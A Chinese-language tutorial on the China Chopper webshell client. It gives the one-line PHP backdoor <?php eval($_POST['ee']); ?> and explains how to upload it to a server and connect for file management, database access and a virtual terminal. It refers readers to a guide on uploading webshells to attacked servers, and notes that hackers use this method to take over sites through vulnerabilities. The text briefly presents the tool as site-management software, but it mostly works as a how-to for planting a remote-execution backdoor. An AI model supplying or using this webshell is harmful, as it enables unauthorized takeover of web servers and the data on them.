中國菜刀,一個非常好用而又強大的webshell,它可不是用來切菜的做飯的道具哦,是一款專業的網站管理軟件,大小只有300多KB,真是小巧實用啊!不過被不法分子利用到,就是一個黑站的利器了。我記得以前接觸的時候摸索了好久才會用,哈哈。。后來領悟之后才發現並不難操作,同時功能也比我想象的要強大。
1.中國菜刀支持的服務端腳本:PHP、ASP;
2.主要功能有:文件管理(有足夠的權限時候可以管理整個磁盤/文件系統),數據庫管理,虛擬終端。
3.菜刀的工作原理是:利用上傳到服務器的一句話腳本再通過一些添加配置就可以工作了。
今天我只介紹PHP的方法(其他的大同小異)。
首先:我們首先要新建一個php文件,文件名隨意取,然后寫入一句代碼:<?php eval($_POST['ee']); ?> ;eval()這個函數大家並不陌生吧,就是把里面的字符串作為PHP代碼執行。最后把這個文件保存,上傳到你站點里面,可以是根目錄,也可以是其他,都行的。
(至於如何將該webshell上傳到被攻擊的服務器請參考文章:webshell上傳方法)如下圖:
第二步:打開菜刀這個軟件,進入如下界面,右鍵點擊“添加”;如下圖:
第三步:此時會彈出一個添加shell的對話框,由圖一看出我的 “dxr.php”上傳在站點根目錄,所以這里的地址填為:http://localhost/dxr.php 。地址后面的小框框里面的“ee”就是你的“口令”,也就是<?php eval($_POST['ee']); ?> 這里的“ee”。下面配置項如果你知道用戶名密碼就填,不知道,不填,也不會影響文件管理和虛擬終端這兩個功能,只是不能查看數據庫了。
最后:點擊“添加”按鈕,成功后就會產生一條新的記錄,鼠標右鍵點擊就可以進行操作了,如下圖,可以進行文件管理,數據庫管理,虛擬終端。哈哈...大功告成!!
所以很多黑站者利用一些網站漏洞,上傳一句話木馬后,就基本上可以黑下你的站了。中國菜刀,就是這么強大!!
操作效果截圖一:
操作效果截圖二:
操作效果截圖三:
